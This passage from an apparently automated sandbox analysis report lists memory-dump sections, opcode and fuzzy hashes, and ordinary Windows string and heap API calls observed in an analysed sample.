                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcess
                        • String ID: @
                        • API String ID: 1357844191-2766056989
                        • Opcode ID: a781f2f5e1af616c81148f0273536b2d3e7cecfe5e5b1318ade370282d8d189b
                        • Instruction ID: afde8686e9e2d58ea7369abe2491f63fade17b6ab80f46780a513ef5ed816537
                        • Opcode Fuzzy Hash: a781f2f5e1af616c81148f0273536b2d3e7cecfe5e5b1318ade370282d8d189b
                        • Instruction Fuzzy Hash: 5C218EB06006029FEB208B20DD84BB673F8EB41705F444978FA46CB6C5FBB5E955C760
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092244C
                        • lstrlen.KERNEL32(00000000), ref: 009224E9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00922570
                        • lstrlen.KERNEL32(00000000), ref: 00922577
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 46015193d1337cccf5522708c2d380c39e41b55c540387ca586f5784b21e0b1e
                        • Instruction ID: 6c6928d897ab24bbe06abb9d5bd6d7d94a16f6a25195621df122610c14453804
                        • Opcode Fuzzy Hash: 46015193d1337cccf5522708c2d380c39e41b55c540387ca586f5784b21e0b1e
                        • Instruction Fuzzy Hash: D281E3B1E00216ABDB14DF98EC44BAEB7B9EF84300F248069E508A7285EB759D45CF90
                        APIs
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000), ref: 0090162D
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 0090164F
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 00901671
                          • Part of subcall function 00901610: lstrcpy.KERNEL32(00000000,?), ref: 00901693
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901557
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901579
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090159B
                        • lstrcpy.KERNEL32(00000000,?), ref: 009015FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 13bfed507301aba6dad0cfa2003c44f4096eca15151f971bd31b8e2989a4a4d2
                        • Instruction ID: 0329c249f6284a9a3470cbfa80ea1d7dd9d98aa2be90b8e9b57075ef7fd103cf
                        • Opcode Fuzzy Hash: 13bfed507301aba6dad0cfa2003c44f4096eca15151f971bd31b8e2989a4a4d2
                        • Instruction Fuzzy Hash: 3231D674A01F02AFC724DF3AC588956BBF9BF88300714492DA896C7B50DB70F811CB80
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 009215A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 009215D9
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921611
                        • lstrcpy.KERNEL32(00000000,?), ref: 00921649
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: c28c39acb424bf1aae10d86c1184b610381d25b0a99cc37ee1417042905790b4
                        • Instruction ID: eb88faf2a4044f0202fa9786ce6a11d1c2dddbe42c36b28faaa7e8e7f024de33
                        • Opcode Fuzzy Hash: c28c39acb424bf1aae10d86c1184b610381d25b0a99cc37ee1417042905790b4
                        • Instruction Fuzzy Hash: 78211974611B029FD734DF2AE598B1BB7F8AF94700B14491CA496C7A84DB30F851CB90
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 0090162D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090164F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901671
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID:
                        • API String ID: 3722407311-0
                        • Opcode ID: 3a0f40bc9216f044724ceb6abc49f6e0b91bfb4b511127124bacff8934835973
                        • Instruction ID: e5501a31f1ff26a60ccb34ec2e1d733512635873d199c838ca9ee6ab6ed716c2
                        • Opcode Fuzzy Hash: 3a0f40bc9216f044724ceb6abc49f6e0b91bfb4b511127124bacff8934835973
                        • Instruction Fuzzy Hash: F711FE74A11B02AFDB249F75D95C926B7FCBF44701718452DA496D3B80EB31E841DB90